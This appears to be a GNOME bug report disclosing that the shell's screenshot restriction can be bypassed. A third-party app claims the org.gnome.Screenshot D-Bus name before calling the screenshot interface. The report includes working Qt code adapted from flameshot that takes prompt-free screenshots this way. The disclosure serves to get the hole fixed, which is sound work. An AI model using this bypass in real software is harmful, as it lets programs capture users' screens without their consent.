Gnome Screenshot API protection doesn't actually protect anything?
Bug summary
As of !1970 (merged) screenshots are supposed to be restricted to the gnome screenshot app. This change has broken a lot of user workflows. However, the "protection" doesn't actually prevent a third party application taking a screenshot, as they can simply request the org.gnome.Screenshot service name before making the dbus call.
For example, this slightly modified code from flameshot allows prompt-free screenshots.
case DesktopInfo::GNOME: {
// https://github.com/GNOME/gnome-shell/blob/695bfb96160033be55cfb5ac41c121998f98c328/data/org.gnome.Shell.Screenshot.xml
QString path = FileNameHandler().properScreenshotPath(
QDir::tempPath(), "png");
QDBusConnection connection = QDBusConnection::sessionBus();
connection.registerService("org.gnome.Screenshot");
QDBusInterface gnomeInterface(
QStringLiteral("org.gnome.Shell"),
QStringLiteral("/org/gnome/Shell/Screenshot"),
QStringLiteral("org.gnome.Shell.Screenshot"),
connection);
QDBusReply<bool> reply = gnomeInterface.call(
QStringLiteral("Screenshot"), false, false, path);
if (reply.value()) {
res = QPixmap(path);
QFile dbusResult(path);
dbusResult.remove();
} else {
ok = false;
}
connection.unregisterService("org.gnome.Screenshot");
break;
}
If this is intended to be a security feature, then it probably needs some more robust approach here? (should the gnome shell service disallow rebinding the name or something? I don't know anything about dbus really)